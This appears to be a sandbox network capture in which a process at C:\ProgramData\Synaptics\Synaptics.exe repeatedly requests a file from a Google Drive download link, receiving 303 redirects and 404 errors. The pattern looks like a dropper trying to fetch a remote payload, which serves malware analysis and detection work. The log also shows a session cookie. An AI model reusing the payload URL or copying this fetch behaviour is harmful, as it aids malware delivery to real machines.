2024-12-25 08:07:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:39 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-eGle5Il-NYPLOWKAqkpVCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49783 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:07:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:39 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-DzYkfkFn5aMrFOFf0cKVzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49788 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:41 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:07:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:41 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-XcmUJZvQRmWLvnVJF64-Zw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49789 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:41 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:07:42 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC4-gXrvpnS_x0sRkk5UjghrjASPgjZtMq48-Ign2VLt4zFndu5UpCUbYvo9vIyGx2vqawHggZo
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:42 GMT
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-2tdIgcJMty6xbvmB5N4kfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:07:42 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-25 08:07:42 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="AJmKisIG6is-otd03sGniw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-25 08:07:42 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49790 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:41 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:07:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:41 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ygT1NUCnJEfDO1yINcJNyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49787 | 142.250.181.97 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:41 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Cookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
2024-12-25 08:07:42 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                X-GUploader-UploadID: AFiumC5tWkbpQQfrWHUB1qF2whu5JOzeaVIYdglggN0xXM8cFaz--Cqbmg_Z7rVJ6lfhQN_ro7ePPwA
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:42 GMT
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-AMTLmBSgpgtiXi7zY_-KAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Content-Length: 1652
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                Connection: close
2024-12-25 08:07:42 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-25 08:07:42 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="2ykxNGj6vKONlD3D_YTmkw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-25 08:07:42 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49800 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:44 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:07:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:45 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Lm08MErOMzF_1LRLM5XxSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49801 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:44 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                                                Host: docs.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-25 08:07:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Wed, 25 Dec 2024 08:07:45 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-r9mie0ztFzqmSyIyZqej6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49810 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:48 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:49 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-f4MvB2hoZIr35eh-Nhvvhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49811 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:48 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:49 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'report-sample' 'nonce-m7qlLIs-FzE8yNNh40X37A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49821 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:52 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:53 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-djY3v4uWc5CYz4HKhHO3Cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49822 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:52 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:53 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'report-sample' 'nonce-Z7scb3zTjj3ga8VP017nUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49831 | 142.250.181.14 | 443 | 6100 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-25 08:07:56 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-25 08:07:57 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 25 Dec 2024 08:07:57 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
